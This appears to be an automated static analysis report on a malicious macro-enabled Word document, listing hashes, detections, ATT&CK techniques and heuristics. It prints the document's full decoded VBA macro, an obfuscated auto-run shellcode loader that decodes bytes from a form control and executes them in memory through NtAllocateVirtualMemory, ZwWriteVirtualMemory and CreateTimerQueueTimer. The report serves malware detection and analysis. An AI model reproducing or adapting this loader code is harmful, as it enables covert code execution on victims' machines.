Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ea425ff715ab9e44…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 176.0 KB
Created: 2018-06-05 13:57:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 5b1040cb2cb67947febb10087f90b843
SHA-1: 1525e68afe99887d40f2c4be4668f692d8a328f9
SHA-256: ea425ff715ab9e4442ad99c51de73266241f4b3518c2a0d739c45227c2694b7a
Risk score: 110

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it's a macro-based downloader. The presence of a Document_Open macro and embedded VBA code strongly suggests the intent to execute malicious code upon opening. The VBA script, though obfuscated, likely attempts to download and run a secondary payload, a common tactic for this type of malware.

Heuristics (5)

  • ClamAV: Doc.Downloader.Macro-6539595-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • NOP-equivalent sled detected (severity: medium, rule: SC_NOP_EQUIV_SLED)
    Long run of 0x40 bytes
    Disassembly
    Attempted x86 opcode disassembly
    0000180D  40                inc eax
    0000180E  40                inc eax
    0000180F  40                inc eax
    00001810  40                inc eax
    00001811  40                inc eax
    00001812  40                inc eax
    00001813  40                inc eax
    00001814  40                inc eax
    00001815  40                inc eax
    00001816  40                inc eax
    00001817  40                inc eax
    00001818  40                inc eax
    00001819  40                inc eax
    0000181A  40                inc eax
    0000181B  40                inc eax
    0000181C  40                inc eax
    0000181D  40                inc eax
    0000181E  40                inc eax
    0000181F  40                inc eax
    00001820  40                inc eax
    00001821  40                inc eax
    00001822  40                inc eax
    00001823  40                inc eax
    00001824  40                inc eax
    00001825  40                inc eax
    00001826  40                inc eax
    00001827  40                inc eax
    00001828  40                inc eax
    00001829  40                inc eax
    0000182A  40                inc eax
    0000182B  40                inc eax
    0000182C  40                inc eax
    0000182D  40                inc eax
    0000182E  40                inc eax
    0000182F  40                inc eax
    00001830  40                inc eax
    00001831  40                inc eax
    00001832  40                inc eax
    00001833  40                inc eax
    00001834  40                inc eax
    00001835  40                inc eax
    00001836  40                inc eax
    00001837  40                inc eax
    00001838  40                inc eax
    00001839  40                inc eax
    0000183A  40                inc eax
    0000183B  40                inc eax
    0000183C  40                inc eax
    0000183D  40                inc eax
    0000183E  40                inc eax
    0000183F  40                inc eax
    00001840  40                inc eax
    00001841  40                inc eax
    00001842  40                inc eax
    00001843  40                inc eax
    00001844  40                inc eax
    00001845  40                inc eax
    00001846  40                inc eax
    00001847  40                inc eax
    00001848  40                inc eax
    00001849  40                inc eax
    0000184A  40                inc eax
    0000184B  40                inc eax
    0000184C  40                inc eax
    0000184D  40                inc eax
    0000184E  40                inc eax
    0000184F  40                inc eax
    00001850  40                inc eax
    00001851  40                inc eax
    00001852  40                inc eax
    00001853  40                inc eax
    00001854  40                inc eax
    00001855  40                inc eax
    00001856  40                inc eax
    00001857  40                inc eax
    00001858  40                inc eax
    00001859  40                inc eax
    0000185A  40                inc eax
    0000185B  40                inc eax
    0000185C  40                inc eax
    0000185D  40                inc eax
    0000185E  40                inc eax
    0000185F  40                inc eax
    00001860  40                inc eax
    00001861  40                inc eax
    00001862  40                inc eax
    00001863  40                inc eax
    00001864  40                inc eax
    00001865  40                inc eax
    00001866  40                inc eax
    00001867  40                inc eax
    00001868  40                inc eax
    00001869  40                inc eax
    0000186A  40                inc eax
    0000186B  40                inc eax
    0000186C  40                inc eax
  • VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: low, rule: OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim milliradian As String
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13810 bytes
SHA-256: a03f6e9b6feac72667c7b0003ae98de513c56f220159c5c3791fd9b8da789fe2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub MyTestArray()
    Dim myArray(1 To 4) As String ' Declaring array and setting bounds
    Dim Response As String
    Dim i As Integer
    Dim myFlag As Boolean

    myFlag = False
    myArray(1) = "A"
    myArray(2) = "B"
    myArray(3) = "C"
    myArray(4) = "D"

    Do Until myFlag = True
        Response = InputBox("Please enter your choice: (i.e. A,B,C or D)")
        For i = 1 To 4
            If UCase(Response) = UCase(myArray(i)) Then
                    myFlag = True: Exit For
            End If
        Next i
    Loop
End Sub

Sub charronia()
Dim elongation As Long
Dim aft As Variant
dalmatia.convivial.Value = Day(#12/5/2013#)
varday = coagulate = susurrant
bay = dracunculus
lentor = "cairina"
blossoming = "asia"
nonequivalence = qucksands

functionalism = "agropyron"
windy = "infuse"
snob = "kibitka"
Set immesh = dalmatia.convivial.SelectedItem
cur = 30 + 20
 Pmt 0, cur, 31994, 42250, 5

morceau = immesh.Name
adelgidae = 42 - 89 + 7891
lemures = Right(morceau, adelgidae)
lyricality = deckle.associationism(lemures)
anaglyphy = 6 + 35
 Pmt 0, anaglyphy, 26684, 37632, 7

asclepiad = "evaluator"
#If (8 - 86 + 478 + 32 - 14 + 282) > ((47 - 35 + 308) - (30 - 48 + 558) * 1) And ((71 - 50 + 7) - (120 - 79 - 13)) * 2 < (Win64) Then
Dim blessed As String
Dim pharmacological As LongPtr
Dim connate As LongPtr
Dim quilck As Integer
#ElseIf (69 - 99 + 430 + 117 - 58 + 241) > ((77 - 10 + 253) - (23 - 41 + 558) * 1) And Not ((112 - 116 + 32) - (77 - 90 + 41)) * 2 < (Win64) Then
Dim moneybag As Byte
Dim connate As Long
Dim meshes As String
Dim pharmacological As Long
#End If
bomber = 121 - 46 - 75
ferociously = "certifiable"
annalistic = 44 - 12 + 4064
enology = 48 + 10
 Pmt 0, enology, 6000, 59593, 3

briarwood = "scrambling"
bey = "retrospection"
mawworm = buckshee
casuarinaceae = 26 + 47
 Pmt 0, casuarinaceae, 2847, 52052, 8

vadium = lyricality
diaphragm = "pettily"
pharmacological = amidst(vadium)
inclination = acrobatic
extrinsicality = "acheta"
#If (64 - 77 + 413 + 20 - 118 + 398) > ((114 - 47 + 253) - (27 - 114 + 627) * 1) And ((32 - 106 + 102) - (23 - 116 + 121)) * 2 < (Win64) Then
Dim consols As Byte
Dim disapproving As LongPtr
Dim pretense As LongPtr
Dim abbreviate As LongPtr
milliary = 55 - 90 + 2099
#ElseIf (23 - 1 + 378 + 73 - 53 + 280) > ((50 - 88 + 358) - (12 - 56 + 584) * 1) And Not ((124 - 67 - 29) - (117 - 127 + 38)) * 2 < (Win64) Then
Dim disapproving As Long
greenockite = 42 - 17 + 756
Dim pretense As Long
Dim abbreviate As Long
milliary = greenockite + 3459

#End If
Dim committeewoman As Variant
Dim oppositeness As Variant
disapproving = 36 - 15 - 21
connate = pharmacological + milliary
pretense = 108 - 21 + 201440
abbreviate = 58 - 71 + 3513
archenteron = headlike(pretense, disapproving, connate, disapproving, disapproving, disapproving, disapproving)
silicle = 8 + 12
 Pmt 0, silicle, 34176, 40946, 8

End Sub

Private Sub Document_Open()
Dim milliradian As String
Dim pace As Integer
seventies = "barrage"
charronia
janissary = 20 + 2
 Pmt 0, janissary, 36851, 50656, 4
End Sub
Function assyriology(anaphase, propitiation, illdisposed)
Dim botanic As Long
Dim parana As Byte
Dim parrotfish As LongPtr
Dim mastermind As LongPtr
Dim polaroid As LongPtr
Dim inquiringly As Byte
Dim enterprising As LongPtr
Dim beeswax As LongPtr
complicity = complicity And 58
mensongesfrench = erignathus
mastermind = anaphase
beeswax = illdisposed
seditions = Math.Round(315)
enterprising = propitiation
sanative = 31 + 13
 Pmt 0, sanative, 17927, 41448, 5

seditions = Fix(418)
parrotfish = 100 - 22 - 79
callionymidae ByVal parrotfish, _
mastermind, _
enterprising, beeswax, _
polaroid
mensongesfrench = erignathus
End Function
Function amidst(athelstan)
Dim holster As String
Dim mendicity As String
Dim comparatively As String
Dim cornmeal As Variant
#If (46 - 44 + 398 + 95 - 7 + 212) > ((52 - 113 + 381) - (25 - 95 + 610) * 1) And ((76 - 71 + 23) - (43 - 13 - 2)) * 2 < (Win64) Then
Dim isogram As Integer
Dim greasewood As LongPtr
allograph = 11 - 20 + 17
Dim superbug As LongPtr
Dim eyespot As Integer
Dim auspicium As Integer
Dim chimera As LongPtr
Dim marches As String
bunion = VarPtr(greasewood)
odylic = assyriology(bunion, VarPtr(athelstan) + (2 - 111 + 117), allograph)
#ElseIf (17 - 77 + 460 + 74 - 52 + 278) > ((96 - 71 + 295) - (82 - 32 + 490) * 1) And Not ((9 - 16 + 35) - (62 - 9 - 25)) * 2 < (Win64) Then
Dim greasewood As Long
allograph = 10 - 45 + 39
Dim superbug As Long
Dim chimera As Long
bunion = VarPtr(greasewood)
odylic = attrition(bunion, VarPtr(athelstan) + (15 - 72 + 65), allograph)
#End If
donnybrook = 28 - 67 + 38
superbug = 44 - 59 + 15
darwinism = 53 - 62 + 9
chimera = 127 - 83 + 9374
plutocracy = 56 - 58 + 4098
overpayment = 108 - 77 + 33
delf = lessen(ByVal donnybrook, _
superbug, ByVal darwinism, chimera, ByVal plutocracy, _
ByVal overpayment)
seditions = Math.Round(185)

complicity = Rnd(313)

#If (40 - 18 + 378 + 25 - 127 + 402) > ((29 - 7 + 298) - (2 - 76 + 614) * 1) And ((22 - 107 + 113) - (83 - 103 + 48)) * 2 < (Win64) Then
incrassation = assyriology(superbug, greasewood, 108 - 83 + 5858)
#ElseIf (119 - 15 + 296 + 47 - 27 + 280) > ((112 - 114 + 322) - (8 - 17 + 549) * 1) And Not ((91 - 83 + 20) - (50 - 14 - 8)) * 2 < (Win64) Then
caliban = attrition(superbug, greasewood, 35 - 113 + 5961)
#End If
neohygrophorus = 60 + 7
 Pmt 0, neohygrophorus, 13682, 12639, 5

amidst = superbug
End Function
Function attrition(hypermarket, theosophy, bushman)
Dim indefiniteness As Long
Dim argasidae As String
Dim macaw As Long
Dim epoch As String
Dim palmales As Long
Dim beret As Integer
Dim amitotic As Long
Dim grumous As Long
Dim patrol As Long
Dim interplanetary As Byte
Dim misocainea As Long
mensongesfrench = mensongesfrench
mensongesfrench = mensongesfrench
indefiniteness = hypermarket
patrol = bushman
erignathus = "lichenes"
palmales = theosophy
sugarloaf = 15 + 40
 Pmt 0, sugarloaf, 6903, 50808, 2

complicity = Fix(179)
macaw = 43 - 49 + 5
callionymidae ByVal macaw, indefiniteness, palmales, patrol, amitotic
unrepining = seditions / 375
End Function


Attribute VB_Name = "deckle"
#If (117 - 114 + 397 + 103 - 102 + 299) > ((105 - 93 + 308) - (45 - 50 + 545) * 1) And ((67 - 21 - 18) - (117 - 58 - 31)) * 2 < (Win64) Then
Public  Declare PtrSafe Function headlike _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (manubrium As Any, ByVal arbiter As Any, ByVal panhellenic As Any, ByVal primed As Any, ByVal avulso As Any, ByVal blessed As Any, ByVal loner As Any) As Long
Public Declare PtrSafe Function lessen _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (cushcush As LongPtr, erebus As LongPtr, ByVal annis As LongPtr,hydrasByVal As LongPtr, magsman As LongPtr, ByVal closeness As LongPtr) As LongPtr
Public Declare PtrSafe Function amphibolite _
Lib "Shlwapi  " Alias _
"SleepConditionVariableSRW" (ByVal placement As Any, beating As Any, past As Any, oleandraceae As Any) As LongPtr
Public Declare PtrSafe Function grog _
Lib "ntdll   " Alias _
"AcquireSRWLockShared" (burrlike As Any) As LongPtr
Public Declare PtrSafe Function ashcan _
Lib "Shlwapi   " Alias _
"GetOverlappedResult" (ByVal biliary As Any, byre As Any, obsequious As Any, glissade As Any) As LongPtr
Public Declare PtrSafe Function callionymidae _
Lib "ntdll    " Alias _
"ZwWriteVirtualMemory" (ByVal caesura As Any, ByVal ginger As Any, ByVal coreference As Any, ByVal akin As Any, ByVal fieriness As Any) As LongPtr

#ElseIf (120 - 84 + 364 + 27 - 69 + 342) > ((63 - 93 + 350) - (22 - 74 + 592) * 1) And Not ((120 - 108 + 16) - (62 - 25 - 9)) * 2 < (Win64) Then
Public Declare Function headlike _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (mounting As Any, ByVal trouvere As Any, ByVal catachrestic As Any, ByVal describe As Any, ByVal abstract As Any, ByVal biflagellate As Any, ByVal bisquit As Any) As Long
Public Declare Function oleandra _
Lib "ntdll    " Alias _
"AcquireSRWLockShared" (seeking As Any) As Long
Public Declare Function callionymidae _
Lib "ntdll    " Alias _
"ZwWriteVirtualMemory" (ByVal effortlessly As Any, ByVal protoplasm As Any, ByVal crustose As Any, ByVal carthusian As Any, ByVal compensation As Any) As Long
Public Declare Function boatswain _
Lib "Shlwapi   " Alias _
"GetOverlappedResult" (ByVal cusp As Any, lens As Any, superannuated As Any, shorn As Any) As Long
Public Declare Function hideaway _
Lib "Shlwapi   " Alias _
"SleepConditionVariableSRW" (ByVal dad As Any, spectrometric As Any, betulaceous As Any, duplicature As Any) As Long
Public Declare Function lessen _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (geotropism As Long, lubricity As Long, ByVal discontentment As Long, hypoactiveByVal As Long, regulate As Long, ByVal missile As Long) As Long

#End If
Function associationism(strawboard) As String
Dim scours As Long
Dim telephotography As String
complicity = Math.Round(227)

Dim sociologically As Long
Dim abnormalize(6962) As Byte
Dim chyle As Long
Dim chrism() As Byte
Dim chorizagrotis(63) As Long
Dim brat As Integer
Dim macaire(63) As Long
Dim gentlemanly As Long
Dim currishly(63) As Long
endlessly = 34 - 36 + 16711682
whiffletree = 100 - 35 - 1
Dim bel As Variant

bloodyminded = 86 - 72 + 4082
bazeingr = 57 - 40 + 65519
jhuth = 91 - 91 + 262144
cashew = 22 - 71 + 258097
vesalius = 3 - 106 + 166
been = 106 - 24 + 16514990
Dim fidus As Byte

nati = 99 - 20 + 177
prepubescent = 46 - 23 + 4009
Dim lightsomeness As Long

nozzle = 78 - 34 + 65236
corollary = 37 - 49 + 267
Dim sublimity As Long
delilah = 8 - 65 + 7900
Dim abrasion() As Byte
abrasion = VBA.StrConv(strawboard, 120 + 8)
paraboloid = 44 + 55
 Pmt 0, paraboloid, 5934, 30053, 2

circularknit = 7843
madwoman = vbKeyShift - 12
For unaligned = 0 To circularknit
If unaligned Mod 2 = 0 Then
abrasion(unaligned) = abrasion(unaligned) - madwoman
Else
abrasion(unaligned) = abrasion(unaligned) - (madwoman - 1)
End If
Next unaligned
monistic = 24 + 6
 Pmt 0, monistic, 19309, 35586, 7

brat = 0
amah = dynamite
For chyle = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
currishly(chyle) = churl(chyle, whiffletree, 49)
chorizagrotis(chyle) = churl(chyle, bloodyminded, 49)
macaire(chyle) = churl(chyle, jhuth, 49)
Next chyle
faithless = 31 + 2
 Pmt 0, faithless, 4128, 38197, 6

chrism = abrasion
branchiopod = 76 - 94 + 22
bottomland = 45 + 24
 Pmt 0, bottomland, 9912, 41348, 8

backhand = 73 - 88 + 18
unrepining = complicity - 177

mensongesfrench = erignathus

stares = backhand + 1
hyperborean = 11 - 39 + 30
For scours = 0 To circularknit
edible = chrism(scours)
balbriggan = chrism(scours + 2)
cloudy = chorizagrotis(amah(chrism(scours + 1)))
musketry = currishly(amah(balbriggan)) + amah(chrism(scours + backhand))
sociologically = macaire(amah(edible)) + cloudy + musketry
chyle = churl(sociologically, endlessly, 41)
abnormalize(gentlemanly) = churl(chyle, bazeingr, 31)
chyle = churl(sociologically, nozzle, 41)
abnormalize(gentlemanly + 1) = churl(chyle, nati, 31)
abnormalize(gentlemanly + hyperborean) = churl(sociologically, corollary, 41)
gentlemanly = gentlemanly + hyperborean + 1
scours = scours + 3
Next
associationism = abnormalize
End Function

Function hypotonic(chops)
hypotonic = AscW(chops)
End Function
Function dynamite()
Dim turfman(255) As Byte
microglia = 38 - 95 + 122
For i = microglia To (16 - 45 + 120)
turfman(microglia) = microglia - (62 - 84 + 87)
microglia = microglia + 1
If (76 - 88 + 103) < microglia Then
airmanship = camisole + 4 - 43 + 104
Exit For
End If
civile = elderberry + 27 - 29 + 67
Next
microglia = (76 - 124 + 96)
For i = microglia To (85 - 41 + 14)
turfman(microglia) = microglia + (104 - 90 - 10)
microglia = microglia + 1
If (53 - 102 + 107) < microglia Then
acariasis = optimism + 81 - 44 + 28
Exit For
End If
infamous = ungentle + 126 - 51 - 10
Next
microglia = (90 - 119 + 126)
For i = microglia To (20 - 46 + 149)
turfman(microglia) = microglia - (91 - 112 + 92)
microglia = microglia + 1
oneirocritic = bigamy + 14 - 14 + 65
If (63 - 35 + 95) < microglia Then
doublebedded = porousness + 99 - 111 + 77
Exit For
End If
beacon = orleanist + 118 - 106 + 53
Next
turfman(106 - 10 - 49) = (50 - 57 + 70)
microglia = (120 - 6 - 71)
turfman(microglia) = (60 - 121 + 123)
dynamite = turfman
End Function
Sub range()
    Dim rngFirstList As range
    Set rngFirstList = ActiveDocument.Lists(1).range
    ActiveDocument.Windows(1).ScrollIntoView Obj:=rngFirstList, Start:=False
    rngFirstList.Select
    Selection.Collapse Direction:=wdCollapseEnd
    Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdMove
End Sub

Function churl(sedativehypnotic, chine, disused)
Select Case disused
Case 31 + (10 / 2 - 5)
churl = sedativehypnotic \ chine
Case 41 + (5 - 3) / 2 - 1
churl = sedativehypnotic And chine
Case 49 + (56 / 7 - 4 * 2)
churl = sedativehypnotic * chine
End Select
End Function


Attribute VB_Name = "dalmatia"
Attribute VB_Base = "0{AB6DF160-CB04-4CB3-9A5A-F90DCC2FC2B7}{101CE94B-4C91-4B50-A705-BD3E3EF1583D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False